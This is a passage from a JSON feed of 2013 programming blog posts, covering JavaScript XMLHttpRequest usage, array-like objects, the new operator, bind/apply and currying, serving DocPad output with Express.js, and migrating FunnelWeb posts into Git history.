If you’ve got an older browser there are other options available.\nPOST-ing dataWe’ve seen how to GET data, but what about if we want to POST data?\nObviously we’d need to change the open call:\nxhr.open('POST', '/foo'); But we’re probably going to want to submit some data too right? That’s the whole point of a POST isn’t it? Most likely you’re going to be POST-ing data from a form, and to do that you can use the FormData API. In this scenario you need to pass the FormData instance through the send method:\nvar data = new FormData(); data.append('name', 'Aaron'); xhr.send(data); This will send up request body with name=Aaron in it, where name is the key of a form value and Aaron is the value. This can be read out of the middleware of whatever HTTP framework you’re working with. ASP.Net this would be the HttpRequest.Form object, Express.js it’ll be request.form.\nIf you’re not posting FormData but instead want to POST JSON then you’ll need to do make sure your server knows it’s like that, and doing so means setting the headers appropriately. First off you’ll want to set the Content-Type header:\nxhr.setRequestHeader('Content-Type', 'application/json'); This is especially important if you’re using ASP.Net MVC as your end point, it will detect the Content-Type and be able to parse it into your model. Next you’ll want to make sure that you set the Content-Length so your server knows how much data to expect:\nxhr.setRequestHeader('Content-Length', JSON.stringify(data).length); And finally when you call send you’ll need to send up a JSON string, not the object:\nxhr.send(JSON.stringify(data)); ConclusionSo there we have it, we’ve seen the building blocks of making an AJAX request, the XMLHttpRequest object. We’ve seen how to make GET and POST requests, pass up data, manipulate headers and get data back in a response.\nFrom these building blocks you can start understanding what is actually happening in your libraries and even avoid them if you don’t want the overhead (say a mobile app).\n", "id": "2013-08-02-ajax-without-jquery" }, { "title": "Array-like objects", "url": "https://www.aaron-powell.com/posts/2013-07-22-array-like-objects/", "date": "Mon, 22 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "Just because it looks like a duck, walks like a duck, quacks like a duck doesn't mean it's a duck. There's dangers with making assumptions of your JavaScript objects based on their surface area.\n\nThat said, a lot of power can be gleamed by these seemingly innocent assumptions.", "content": "You’ve possibly head the saying\nWhen I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck. - credit\nThis is a common adage when talking about Duck Typing in programming, especially when it comes to working with dynamic languages like JavaScript, based on assumptions made about an object you can attempt to infer other details. Statically typed languages on the other hand make it a bit harder to do Duck Typing, that’s not to say it’s impossible.\nDue to the dynamic nature of JavaScript we actually come across this quite often with arrays in JavaScript. So what makes an object an array? 
Well there’s two basic building blocks of an array:\nNumerical identifiers A length property So take this code snippet:\nvar foo = ??; for (var i = 0; i < foo.length; i++) { console.log(foo[i]); } From this we can infer that foo is quite possibly an array, it meets our basic requirements to be an array, but like the dangers of duck typing this doesn’t mean that it’s actually an array does it?\nArray-like objectsIt’s quite common in JavaScript to come across array-like objects, objects that on the surface look like arrays but as soon as you look beneath the surface it’ll become apparent that they aren’t actually arrays. You’ve probably come across these objects in the past and not really given it a second thought, two really common objects are the arguments object and a NodeList (you know, from querySelectorAll). Both of these objects have numerical indexers, length, but no push, pop and so on, basically they don’t inherit Array.prototype.\nWith both of these objects the fact that they don’t inherit from Array.prototype is a bit of a pain, it means you couldn’t do something like this for example:\nvar inputs = form.querySelectorAll('input'); var values = inputs.map(function (input) { return { value: input.value, name: input.getAttribute('name') }; }); So this is a pretty simple bit of code, you want to get all the input name/value pairs, maybe to submit them via AJAX but that’s not important, what’s important is we’re using the Array.map method, something very common if you’re doing anything in a modern JavaScript engine (modern being >= IE9).\nMaking arrays of array-like objectsIf you’ve found yourself an array-like object chances are you want to use it like an array, that begs the obvious question, how do we make it an array?\nWell there’s a pretty easy solution to this, we have numerical indexes and a length property, so what about a for loop:\nvar items = []; for (var i = 0, il = inputs.length; i < il; i++) { items.push(inputs[i]); } But… for loop’s are so old school there’s got to be a better way. Well there is and here we can look at exploiting JavaScript’s functions. We’ve seen that you can use call and apply to futz with function scope and this we can do to improve our array-like object manipulation.\nFutzing sliceWhen you’re wanting to create new arrays from existing ones the easiest way is using the slice method. 
The slice method can be neat if you want to take parts of an array between two indexes, but it can also be used if you want to create a whole clone of the array, like so:\nvar array1 = [1, 2, 3]; var array2 = array1.slice(0); console.log(array1 !== array2); By passing 0 we take a slice starting at index 0 and since we provided no end point it’ll go to the length of the array.\nBut slice is a function just like everything else, you can use call against it.\nAnd where it gets really interesting is when we play with our array-like objects, we can pass that as our context to our slice method:\nvar items = Array.prototype.slice.call(inputs, 0); Yep that’s right, slice doesn’t require an array, just something that looks like an array, as far as slice is concerned it looks like a duck, it quacked, so hey, we’ll treat it like a duck, check out the SpiderMonkey source, it really only cares if there’s a length property, pretty neat!\nConclusionWe’ve seen some building blocks over the last few weeks, things we can use to manipulate functions and objects in the interesting ways and this is just another common usage of the patterns.\nA small piece of advice, if you’re doing a lot of these calls you can assign slice into a variable which you can use, which will make the minification work a whole lot better:\nvar slice = Array.prototype.slice; var items = slice.call(inputs, 0); ", "id": "2013-07-22-array-like-objects" }, { "title": "The JavaScript new operator", "url": "https://www.aaron-powell.com/posts/2013-07-14-javascript-new-operator/", "date": "Sun, 14 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "Time to revisit something that was overlooked in the last post, the `new` operator in JavaScript and what it does.", "content": "In the last post I was changing some C# code to JavaScript but there was one part that I just dropped and didn’t explain why, and that was the use of the new operator.\nWhile JavaScript isn’t a classical language, it’s prototypal, and doesn’t have a notion of classes (yet), but it does have a new operator. What’s interesting is it’s an operator like C# (see 14.5.10 of the spec, yep I looked it up :P), and operators tend to do something unique which is also the case with JavaScript new. 
If you’re a spec-nut you can read what happens in the link above (and also the [[Construct]] method which is important), but if you’re not it does a few things that are of note:\nIt expects a function as the thing being new’ed up The result is a new object that has the prototype of the function that was new’ed, but also potentially their own values (such as values provided as the arguments) So let’s make a simple “class” which consists of a constructor function:\nvar Person = function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }; We can then add members to all instances by modifying the prototype:\nPerson.prototype.fullName = function () { return this.firstName + " " + this.lastName; } Now if we run the following we’ll get two different people:\nvar aaron = new Person('Aaron', 'Powell'); var john = new Person('John', 'Smith'); console.assert(aaron == john); //fails The two people we’ve created are different objects, which is exactly what we expect, but if we did:\nconsole.assert(aaron.fullName == john.fullName); The assert won’t fail since they are the same method reference, but on two different objects.\nAnother important part of the Person constructor has a this scope (which we’ve learnt to manipulate in the past) and what would we expect it to be? Well functions inherit the scope of their parent (unless you modify it) which means that our parent scope of Person will be the global object (window in the browser) or null in ES5 Strict Mode.\nBut that’s not the case when you use the new operator, the new operator is yet another way we can modify this, under this scenario it becomes a completely new object literal, it’s similar to doing this:\nPerson = function () { var obj = {}; var Person = function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }; Person.apply(obj, arguments); return obj; }; Well that’s close, it doesn’t maintain the prototype chain or setup the constructor properly, what it does do is create a new object that is then returned, meaning each invocation of Person will result in a different object, much like the new operator.\nIs it new or not? The problem with the new operator is that it’s applied to a function, it can be applied to any function, but it can also be omitted. This means you can create yourself a function that’s intended to be a constructor but not used with a new operator, and doing this would mean that you’re augmenting a this scope you probably shouldn’t be, such as the global object.\nSo how do we know if someone used the new operator? You’re probably not writing your own pre-parser to check the code before it’s executed so it’s not like you know the omitted it at a code level. Well there’s an alternative check the constructor.\nOne thing I omitted from the above pseudo-new implementation is setting up the obj.constructor property, this is something that the new operator does, and it’s the easiest way to check if a function was invoked with a new operator:\nvar Person = function (firstName, lastName) { if (this.constructor !== Person) { return new Person(firstName, lastName); } //setup properties } Here we’re checking the constructor against the type we expect the constructor to be. 
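A quick sketch of the guard doing its job (reusing the Person constructor from above; the variable names are just for illustration):

var withNew = new Person('Aaron', 'Powell');
var withoutNew = Person('John', 'Smith'); // whoops, forgot the new operator
console.log(withNew instanceof Person); // true
console.log(withoutNew instanceof Person); // true - the guard spotted the missing new and created the instance for us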
If the function wasn’t invoked with the new operator it won’t receive the right constructor type which means we can assume that function was invoked normally and expects a return, a return which can then be a new instance.\nThis can be a very useful trick if you’re exposing something that’s to be constructible but you don’t trust your consumers to do the right thing.\nWrap up The new operator is an interesting one, it’s a great way to create objects that have unique instances but still share a common root (being the prototype). There’s arguments all over the internet about whether you should use the new operator or not, whether your API should not require the new operator, whether not using new means a violation of the API or whether your API should just be smart enough to deal with both usages.\nBut why would you use it? Well that’s a story for another day ;).\n", "id": "2013-07-14-javascript-new-operator" }, { "title": "Implementing \"indexers\" in JavaScript", "url": "https://www.aaron-powell.com/posts/2013-07-10-implementing-indexers-in-javascript/", "date": "Wed, 10 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "My colleague Luke Drumm challenged me to implement C# style indexers in JavaScript.\n\nSo let's have a look at how you can do that, and how you can make some very interesting JavaScript objects that are self replicating. We'll build on the knowledge of using `bind` and `apply` from the last two posts.", "content": "Luke was wanting to know how to implement this C# code as JavaScript:\nclass Foo { public string Stuff { get; set; } public Foo() { } public Foo(string stuff) { this.Stuff = stuff; } public Foo this[string stuff] { get { return new Foo(stuff); } } public Foo Bar() { Console.WriteLine("Darn tootin'"); return this; } } Class-implementation aside the interesting part that he was having trouble with was the indexer, basically being able to write this:\nConsole.WriteLine(new Foo()["one"]["two"]["three"].Bar()); Now what exactly Luke is trying to do I don’t know (and my life is probably safer not knowing) but there’s no point shying away from a problem.\nSo the syntax above is supported by JavaScript, you can use [] notation on an object but it’s different to C#’s implementation. Since JavaScript objects are really glorified hash bags when you use [“one”] it’s saying you want the property one of the object, like when you do it on a C# dictionary type, and this will be fine assuming you have a one property. The problem here is that we don’t have said property, we’re wanting to intercept them and create them on the fly.\nSimulating indexers with functions Some languages support this concept of ‘method missing’ but not JavaScript (well not until we get ES6 proxies) so we need to look at another idea… functions. So we could design something that allows us to write this:\nnew Foo().make("one").make("two").make("three").Bar(); But that’s kind of verbose isn’t it? We’ve got this extra make method that we have to call, we’re still using a new operator, really there’s got to be some nicer way which we could do this… right?\nFunctions that return functions containing functions Let’s make it so we can drop the make part of the above API, so we are now doing this:\nnew Foo()("one")("two")("three").Bar(); That looks somewhat better doesn’t it? Sure we’re using () not [], but that’s minor semantics really, the question is can we actually make that our API? 
Of course we can, and we’ll have a look at how (if you guessed that you couldn’t where did you think this post would go :P).\nSo you know that JavaScript functions are just objects right? Well they are and what’s cool is that since they are just objects we can manipulate them as such. Let’s start with foo, really foo is just a function (since we don’t have classes in JavaScript):\nvar foo = function () { }; Now, I’m going to want something returned from foo that can be invoked like a function, so maybe I could just return a function…\nvar foo = function () { var innerFoo = function () { }; return innerFoo; }; Ok that’s a good start, I can do:\nfoo()(); Next it’s time to make innerFoo do something, basically what innerFoo should do setup the next level down our chain. To keep the function more readable I’m going to push the logic out into a new function, we’ll call it next:\nvar foo = function () { var innerFoo = function () { return next.apply(this, arguments); }; var next = function (stuff) { }; return innerFoo; }; Do you see where we’re going here? The next method is ultimately going to be smart, setting up the next level down our object, whereas the innerFoo is really just a pass-through to that (it’ll be clearer as we implement our next method):\nvar foo = function () { var innerFoo = function () { return next.apply(this, arguments); }; var next = function (stuff) { var child = foo(); child.stuff = stuff; return child; }; return innerFoo; }; So our next method will:\nCreate a new foo function (well, a new innerFoo) Create a property on the function object called stuff Return the newly created object This means that we can do this:\nconsole.log(foo()('one').stuff); // one Or go further:\nconsole.log(foo()('one')('two').stuff); // two Awesome, we’ve pretty much got indexers going, now let’s add the bar method from our original API.\nvar bar = function () { console.log('Darn tootin\\''); return this; } innerFoo.bar = bar; Remember how I mentioned that functions as objects? Well this is where it can be really useful, since it’s an object we can modify it like any JavaScript object and just add methods and properties like we’ve done, and awesomely since we’re going back through our original foo method it’ll work with all the children we get.\nParent access Once I did the initial revision for Luke he wasn’t satisfied, next up he wanted to know how to access the parent of each instance created. Well that’s actually pretty easy, just a small modification to our innerFoo function:\nvar innerFoo = function () { return next.apply(innerFoo, arguments); }; So this time when it invokes the next level down will have a this context which is the parent object, then you can decide how to expose that as you step down.\nBonus round – displaying the object If you’ve run the code and tried to do a console.log/console.dir of the foo instances returned you’ll see they are well… crappy:\nfunction () { return next.apply(innerFoo, arguments); }; Well that’s kinda crappy, can’t exactly see what the value of stuff is, or what an object’s parent is now can we? Guess we better fix that!\nDid you know that Object has a toString method on it? 
This method is generally overlooked, if you’re working with an object you’ll likely get [object Object] when you invoke it from your object, functions will return the text content of the function (which can be useful if you want to modify functions on the fly, but that’s a subject for another day :P), and this is why we get the above output from foo, foo is a function after all.\nWell we can write our own toString method if we want, we just put it on our object and it’ll be used rather than the one inherited from the prototype chain. So let’s do this:\nvar toString = function () { return this.stuff; }; innerFoo.toString = toString; Awesome, done! One thing to keep in mind is that toString must return a string value, it can do whatever you want to get there, just return a string ;).\nBut let’s go one step further and exploit this, let’s get it to output the whole parent graph, I’m going to do this by using bind, like we saw in my last post:\nvar next = function (stuff) { var child = foo(); child.stuff = stuff; child.toString = toString.bind(child, this); return child; }; o.toString = toString.bind(o, null); You’ll also see that I’ve bound the parent as the first argument of toString. toString doesn’t take arguments but by using bind we can do that, now let’s update our toString method to handle it:\nvar toString = function (parent) { return parent + ', ' + this.stuff; }; Nifty huh? We’re exploiting the type coercion in JavaScript, because parent isn’t a string, it’s an object, but we’re using the + operator against another string JavaScript will coerce the object to a string, using its toString method, which in turn invokes the function we wrote, which in turn does coercion and so on!\nDone! And with that we wrap up this week’s adventure, if you’ve made it this far well done it was a long one but damn it was fun!\n", "id": "2013-07-10-implementing-indexers-in-javascript" }, { "title": "JavaScript bind, currying and arrow functions", "url": "https://www.aaron-powell.com/posts/2013-07-05-javascript-binding-currying-and-arrows/", "date": "Fri, 05 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "After confusing my colleagues with how to invoke functions with a modifided set of arguments at a single time the next evolutionary point was to confuse them with creating functions that are always called with a different state.", "content": "How many times have you written code like this:\nvar foo = { makeRequest: function () { $.get('/foo', function (result) { this.update(result); }); ); }, update: function (data) { /* ... */ } }; //somewhere later in the code foo.makeRequest(); Only to have it poo itself saying that this.update is not a function? 
Maybe it was with an event handler rather than an AJAX request; all in all it’s the same problem, you tried to use something and JavaScript changed the value of this on you.\nWelcome to the wonderful world of JavaScript scoping.\nSo there’s a bunch of ways you can solve this, writing the var that = this; style code being a very popular one, basically leveraging closure scopes to keep an instance of the type in memory until the function itself is GC’ed.\nBut there’s another approach, Function.bind.\nWe’ll start with our simple demo:\nvar foo = function (x) { console.log(this, x, arguments); }; As we remember from last time we can get this:\nfoo(42); //console.log(window, 42, [42]); Now say we want the foo function to have a known value of this when it’s called, no matter how it’s invoked, even if someone was to be sneaky and use call or apply? Well that’s what we can use the bind method for:\nvar bar = foo.bind({ a: 'b' }); bar(42); //console.log({ a: 'b' }, 42, [42]); bar.call('abc', 42); So both times we call the bar function we have the same result, even though we’re trying to specify a this context using the call method.\nOther uses for bind While bind is most commonly used to force a function to always have a specific value for the this object it can also be used for another purpose, to bind specific arguments. If we revisit our foo method we could do this:\nvar baz = foo.bind('a', 'b'); baz(); //console.log('a', 'b', ['b']); Practical application of argument binding When you’re looking for a practical application for argument binding an idea that comes to mind is Currying. I’m not going to dive too deeply into what currying is, if you’re not familiar with the concept start with the Wikipedia link and expand from there (also functional programming isn’t my area of expertise, I just understand some of the basics and may be missing the point from here on out, if so Twitter is –> for you to rant on).\nLet’s create a new function to add two numbers:\nvar sum = function (x, y) { return x + y; }; Ideally we want to be able to do something like this:\nvar add2 = curry(sum, 2); add2(4); // 6 Now we’ll create a curry function:\nvar curry = function (fn) { var args = Array.prototype.slice.call(arguments, 1); return fn.bind.apply(fn, [this].concat(args)); }; While this function is kind of trippy looking it’s more because it’s a very generic method, it’s allowing us to curry a function and bind any number of arguments in place (which is why we’re using the apply method of bind to provide an array of arguments) and the arguments we provide when calling the bound function will be appended on to the ones which we pre-bound.\nBut from this we end up with a new function that we can call as above.\nBonus: My colleague Liam Mclennan flicked me this gist of how to do an even cooler currying approach.\nFat arrows If you’ve done anything with CoffeeScript or TypeScript you might be familiar with the concept of fat arrow functions. These languages use a modified syntax to deal with the lexical scoping problem that bind can be used to solve.
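For comparison, the bind version of the makeRequest example from the top of this post would look something like this (a sketch, keeping the jQuery $.get call as-is):

var foo = {
    makeRequest: function () {
        $.get('/foo', function (result) {
            this.update(result); // 'this' is now foo, because we bound it below
        }.bind(this));
    },
    update: function (data) { /* ... */ }
};

foo.makeRequest(); // no more "this.update is not a function"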
TypeScript tracks your usage of this in fat arrow functions and replaces it with a captured variable, CoffeeScript relies on the @ symbol to do a similar thing.\nFor anyone who’s not been following the evolution of ECMAScript 6 (the next version of JavaScript) one of the accepted new syntax features is arrow function syntax.\nSimply put the language is going to have a way to defining a function which you can be confident of what the this value will be (sure you can still futz with it if you want to but it’s covering the most common scenarios).\nTo test out the new arrow function syntax grab Firefox v22 or newer.\n", "id": "2013-07-05-javascript-binding-currying-and-arrows" }, { "title": "JavaScript call and apply", "url": "https://www.aaron-powell.com/posts/2013-07-04-javascript-call-and-apply/", "date": "Thu, 04 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "After having confused one of my colleagues with some code that used the JavaScript `apply` method and giving them an answer that didn't leave them completely bemused I thought I'd share my explanation with the world.", "content": "A colleague recently came across this line in our codebase that I wrote:\nbinding.vehicle.involvements.push.apply(binding.vehicle.involvements, vehicle.involvements); What the overall result of the code is isn’t particularly important, the part that tripped them up (and made them think I’m on drugs I’m not actually on) was this:\nbinding.vehicle.involvements.push.apply(binding.vehicle.involvements, vehicle.involvements); Now the involvements property is an array in both scenarios which exposes a push method, the confusion was around what the apply method does and why I was even using it.\nBoth call and apply are methods which are part of the JavaScript language and are exposed on the Function prototype, meaning that they can be accessed from any function, so let’s say we have this function:\nfunction foo (a) { console.log(this, a, argument); }; And we invoke it like this:\nfoo('b'); It is the same as doing this:\nconsole.log(window, 'b', ['b']); Note: In ES3 it’ll be window, ES5 strict mode it’ll be null, or undefined, I forget which\nNow let’s throw the apply method into the mix and invoke it like so:\nfoo.apply('a', ['b']); This time it’ll be like we’ve done this:\nconsole.log('a', 'b', ['b']); We could alternatively provide an array of arguments so:\nfoo.apply('a', ['b','c']); Becomes:\nconsole.log('a', 'b', ['b', 'c']); So what happened?\nThe apply method takes two arguments, the first is what controls the this value, the second is an array of objects that will be decomposed to represent the various arguments passed in, meaning that the array item 0 will be the first argument, b in our example, and so on.\nThe call method is similar but instead of taking an array that represents the arguments it takes a splat, anything after the this context will be used directly as the arguments. So we’d use call like this to achieve the same result:\nfoo.call('a', 'b', 'c'); Relating it to our original code Let’s think about how this related back to our original code, working with arrays and push. Say I have an array and I want to add N number of values to said array. How would you do it?\nvar arr = [1,2,3]; var arr2 = [4,5,6]; //I want arr == [1,2,3,4,5,6] Well the first obvious candidate is a for loop:\nfor (var i = 0; i < arr2.length; i++) { arr.push(arr2[i]); } That’ll do exactly what we’re after, but there’s a problem, we’re calling push a lot, once for every item in the array in fact(!!). 
This can be a bit of a performance hit, especially if you have large arrays, the JavaScript runtime engine simply can’t optimise it because it doesn’t know how many there could be so it can’t preallocate the memory, meaning it’s somewhat inefficient.\nAlternatively you could use the concat method:\narr = arr.concat(arr2); That works just fine but the problem is that you replace arr with a new instance of it. Generally speaking that’s not a problem, but if you’re relying on the object itself to not change, at a memory level (say it’s an observable property from Knockout, or a bound property in WinJS), you’ll potentially run into problems.\nSo we’re back to push, we want to append multiple items to an existing array without overriding the original object/property. The nice thing about push is that we can provide it N number of arguments which represent all the items we wish to push. Well since I’ve got an array I can’t exactly pass that in directly, since then argument 1 will be the array, it won’t be decomposed. And this is where apply comes in, we can provide the array as the 2nd argument to apply and have N number of items pushed to the array. This brings us to doing this:\narr.push.apply(arr, arr2); And there we have it, we’ve used apply to decompose an array and push all he values into the target array, basically we’ve done this:\narr.push(4,5,6); Since the this context we’ve set is the arr object itself.\nHopefully that does a good enough explanation to confuse everyone ;).\n", "id": "2013-07-04-javascript-call-and-apply" }, { "title": "DDDMelbourne workshop", "url": "https://www.aaron-powell.com/posts/2013-06-26-dddmelbourne-workshop/", "date": "Wed, 26 Jun 2013 00:00:00 +0000", "tags": [ "dddmelbourne" ], "description": "I'm going to be presenting a JavaScript workshop at the upcoming DDDMelbourne conference", "content": "It’s that time of year again, it’s conference time!. I’m excited to announce that I’ll be coming down for my 4th(!!) DDDMelbourne and the overall agenda looks quite exciting!\nThis year the organisers have decided to add a workshop track as well as the three presentations, and when they asked me if I’d do a JavaScript workshop I jumped at the chance.\nThe workshop is going to be on an aspect of JavaScript that I’m quite passionate about and we’ll be getting really hands-on and mostly just writing code for the hour, so bring your device and get ready to code.\nSo register now before it’s too late (ticket’s are going quick).\n", "id": "2013-06-26-dddmelbourne-workshop" }, { "title": "Walking a JavaScript object", "url": "https://www.aaron-powell.com/posts/2013-06-21-walking-a-javascript-object/", "date": "Fri, 21 Jun 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "Ever had a path to a path to a property on a JavaScript object that you want to walk? Something along the lines of `foo.bar.baz`.\n\nRecently I was trying to solve this problem and came across a nifty little trick", "content": "Recently I was trying to solve a problem where I had a JSON path to a property on an object, the path was going to be n layers deep and the object itself was also n layers deep. 
I needed to solve this problem in a fairly generic manner, as there were a number of different scenarios under which this code would be run.\nBasically I had this:\nvar path = 'foo.bar.baz'; And an object like this:\nvar obj = { foo: { bar: { baz: 42 } } }; So from the path I want to be able to find out the value in the object that matches it.\nPass #1A colleague of mine gave me the code which would do this, from an application they had, implemented using a for loop:\nvar value = obj; var paths = path.split('.'); for (var i = 0; i < paths.length; i++) { value = value[paths[i]]; } console.log(value); Well that does exactly what needs to be done, exactly as advertised. Job done right?\nPass #2The for loop is so old school, it’s all functional programming that the kids are into these days, so I looked at our method and decided there had to be another way we could approach this, something a bit more functional.\nSince what we’re doing is walking through an object I wondered "Could I use something from the map/reduce/filter family for that?". Well it turns out that yes, there is something ideal for that: reduce.\nYou see the reduce method takes a callback like this:\nfunction (prev, current) { //return what is to be the next 'prev' value } So as long as the prev value is the level of the object we’re currently walking then we can keep stepping into it, and doing that is fine as we can provide an argument to the reduce method that defines what the initial value will be. This means we can rewrite our walker like so:\nvar value = path.split('.').reduce(function (prev, curr) { return prev[curr]; }, obj); And there we have it, a nice little object walker.\n", "id": "2013-06-21-walking-a-javascript-object" }, { "title": "Solving DocPad's excessive memory usage", "url": "https://www.aaron-powell.com/posts/2013-06-18-solving-docpads-excessive-memory-usage/", "date": "Tue, 18 Jun 2013 00:00:00 +0000", "tags": [ "docpad" ], "description": "After moving my site to DocPad I found a problem, DocPad is a massive memory hog! The result of this is that I can't even run it on a single Heroku web dyno, a static HTML site can't run on a single web dyno!\n\nSo let's have a look at how I went and solved the problem", "content": "Since I decided to move my site from FunnelWeb to DocPad I also decided to deploy to Heroku since I like them as a host. So I built my site, got everything into Git and then I did a git push heroku master.\nAnd then it fell over.\nAs soon as the push completed Heroku kicked off and started to spin up the dyno, but when I hit the site it said it’d crashed.\nCrashed, seriously? It’s a bunch of HTML files, how on earth can that crash?\nSo I crack out the Heroku toolbox and inspect the log files and find the crash: it crashed because it exceeded the allocated memory.\nExceeded the allocated memory?! IT’S A STATIC SITE!\nOk, fine, let’s have a look at what could be wrong, how a static site could be blowing out the memory allowance (512MB is allocated). I fire up the docpad run command, which is what is done on Heroku, and this is what I get:\nThat’s nearly 700MB memory usage for a static site! I’ve seen it peak at over 900MB, run idle around 850MB, all kinds of wacky memory usage.\nThe not so static static siteSo it would seem that I made a false assumption about DocPad, it’s not quite as static as I thought it was.
While yes, it generates all these flat HTML files on disk it also keeps all the content in memory:\n@slace @shiftkey we put all the files in memory for generation and keep them there for quick access, so not a bad thing\n— DocPad (@DocPad) June 2, 2013 Well that’s kind of crap, I mean, I’ve got ~400 files in my generated output so it’s a lot of files that need to be stored in memory when really the requests can just be routed to a location on disk.\nSolving the memory problemI’ve already made my choice to go with DocPad but since it’s having some whacky memory consumption issues meaning that it’s not really going to be a viable deployment option so how can I go about it?\nWell why not use DocPad to generate the HTML and then just write my own routing layer using Express.js? After all DocPad is just sitting on top of Express.js to do a lot of its heavy lifting. In fact it’s really simple to make a routing engine on top of Express.js:\nvar express = require('express'); var app = express(); app.use(express.static(__dirname + '/out')); app.listen(process.env.PORT || 3000); Yep that’s it, we’ve got our site going and now I can deploy it.\nNote: There’s still a bit of a limitation here, DocPad’s memory will blow out mostly during its generation phase so this now means that I have to check the /out folder into my git repository, which makes it larger, but it’s not that big a problem really.\nMaintaining old routes As I said in my last post I needed to ensure that I didn’t break my SEO between my old routes and my new ones. When using DocPad’s engine it’ll look at the urls meta-data which it’ll then 301 the response. Now you can see why DocPad does have some of its heavy memory usage, it actually does some on-the-fly mapping of routes. Still, I’m pretty sure I can do this without the memory explosion.\nMy idea is that we can use the DocPad plugin model and from that generate a JSON object that represents all the alternate routes for our posts, then we can load that JSON into our Express.js app and map the routes.\nMy plugin can be found here and what it does is:\nHook into the writeAfter event Grab all document objects Create an object that contains the URL we want and all the alternate URLs that we want to 301 Strip out any that don’t have alternate URLs Write this to the output folder Here’s the code that’ll create our route map:\nvar docs = this.docpad.getCollection('documents').toJSON(); var routes = docs.map(function (doc) { return { url: doc.url, redirects: doc.urls.filter(function (x) { return x !== doc.url; }) }; }).filter(function (route) { return !!route.redirects.length; }); So from that we can now update our Express.js file to look like so:\nvar express = require('express'); var app = express(); app.get('/routes.json', function (req, res) { res.status(403).send('403 Forbidden'); }) app.use(express.static(__dirname + '/out')); app.use('/get', express.static(__dirname + '/src/files/get')); var routes = require('./out/routes.json').routes; var redirector = function (dest) { return function (req, res) { res.redirect(301, dest); }; }; routes.map(function (route) { if (route.redirects) { return route.redirects.map(function (redirect) { return app.get(redirect, redirector(route.url)); }); } return; }); app.listen(process.env.PORT || 3000); I’ve also put a few other special routes, I’m putting a 403 on the routes.json file since it sits in the root of my out folder and I don’t really want it served out to the world (I’m also serving my assets from a special folder to avoid duplicating them in 
the repo and making it huge).\nConclusionDocPad appears to be a bit of a memory hog which can introduce some problems when you are looking at your hosting options, so make sure you look at that before signing any hosting agreement.\nBut that said if you want to invest a little bit of effort and not rely on DocPad as your routing engine then you can rely on just the HTML that is generated and use a middleware like Express.js to handle the routing with a minimal memory footprint.\nFor the record, my site now run around the 20mb memory footprint.\n", "id": "2013-06-18-solving-docpads-excessive-memory-usage" }, { "title": "From FunnelWeb to Git in a few simple steps", "url": "https://www.aaron-powell.com/posts/2013-06-11-funnelweb-to-git/", "date": "Mon, 10 Jun 2013 00:00:00 +0000", "tags": [ "funnelweb", "scriptcs", "git" ], "description": "With the decision to go to Git from FunnelWeb I wanted to be able to maintain the history of the changes. Since many of my posts have multiple revisions I wanted them to be listed as changesets in Git.\n\nIn this post we'll look at how to get the content out of FunnelWeb (or any content database) and into Git as full history.", "content": "Prelude: I’m going to assume you’ve got the database somewhere locally that you can work with, I wouldn’t recommend doing it against a production database. We’re not doing anything destructive against it but better safe than sorry!.\nThe scenario is that I’m wanting to be able to visualise the revision history of my posts in FunnelWeb as Git commits, each new revision of a post should be a new commit. The history order should match the date that posts were created (or edited) so that it doesn’t look like just a dump into Git, it looks like actual history.\nWithout doing a full Git primer there’s one really important aspect of Git that you need to be aware of. Git is basically a small linux file system so with file system theory under our belt we should know that there’s a date associated with files (or in this case, commits). So at least in theory we should be able to control when a commit happened right? After all I’ve got posts from 2010 and I’d like those commits to reflect that.\nSo armed with a bit of knowledge and Brendan Forster’s skype handle I started digging.\nIt’s a dateSince my work on the time machine is running behind schedule (snap!) it’s time to get an understanding of date’s in Git. Each commit in Git will have two dates associated with it, author date and committer date, and there’s an important difference between these two dates.\nAuthor date is the date when a commit was originally authored in the source repository.\nCommitter date is the date when a commit was applied to the current repository.\nThis is the important bit of information, generally speaking these two dates are the same but they don’t have to be. Say I create a patch file from my repository and send it to you, this will contain an author date, which is the date that I created the commit, and in my repository it matches the commit date. At some future point in time you’re going to add that patch to your repository and when you do that you’ll receive my author date but you’ll have a different commit date, for you see the date that you committed it to the repository has changed, but the commit itself hasn’t (if it did the whole commit would be invalid). A more in-depth write up can be found here.\nAnd this is where the power comes from, you can manipulate these dates. 
This means that I can extract my dates from FunnelWeb and author commits of a particular point in time, but commit them whenever makes sense.\nSide note: General wisdom says you shouldn’t mess around with the committer date, only the author date.\nManipulating GitWell now that we know that we can, at least in theory, manipulate our Git history to match the information that I’d like it to be, the question is how?\nA quick search found this on Stackoverflow, neat-o I can do something like this:\n>> git commit --amend --date="<Date from my post revision>" Well isn’t that nice, the command line exposes what I want, but either having to manually run the commands on the CLI or calling the CLI fro mcode is not a particularly pleasent an idea.\nEnter LibGit2 or more specifically LibGit2Sharp. If you’ve done anything with Git programmatically you’re probably familiar with these libraries. LibGit2 is an implementation of the Git core commands but being written in C it’s not that much fun for .NET developers so that’s where LibGit2Sharp comes in and it’s what we’ll be using.\nExporting out dataI’ll get back to Git in a moment as there’s something important we need to do before we can work with Git and that’s getting us some data.\nFor this I’m going to use Dapper which is a light-weight ORM to talk to the FunnelWeb database, but use whatever works best for you. The important part here is how we run our code.\nWell there’s an obvious option, we could go File -> New Console Application and get cracking, NuGet install our dependencies, etc.\nNah console applications are so 2012, instead I’m going to use ScriptCS.\nIf you haven’t heard of ScriptCS don’t fret, it’s a very new platform. ScriptCS is the brain child of Glenn Block, which is taking his learnings from being heavily involved in Node.js of recent and bringing that to the .NET world. Basically making a way which you can execute a C# file without the need for Visual Studio, the C# compiler or any of those tools we’re use to as .NET developers. Check out Scott Hanselmans post on the topic if you want to learn more.\nNote: You’ll need ScriptCS version 0.5.0 at least as you need my pull request included.\nGetting startedNow we have the idea sorted out, I’m going to start with a ScriptCS project which will use a Dapper to get our data out and LibGit2Sharp to push it into Git, seems nice and simple really. Let’s break this down into the smaller parts.\nOpening our Git repo The first step in our process will be to open up the Git repo so we can work against it. I’ve created a migrator folder which my migrator will reside within and then I’ll go create a new file called app.csx which is my ScriptCS file (note the csx extension).\nI’ll need a using for LibGit2Sharp and then I’m going to create a method 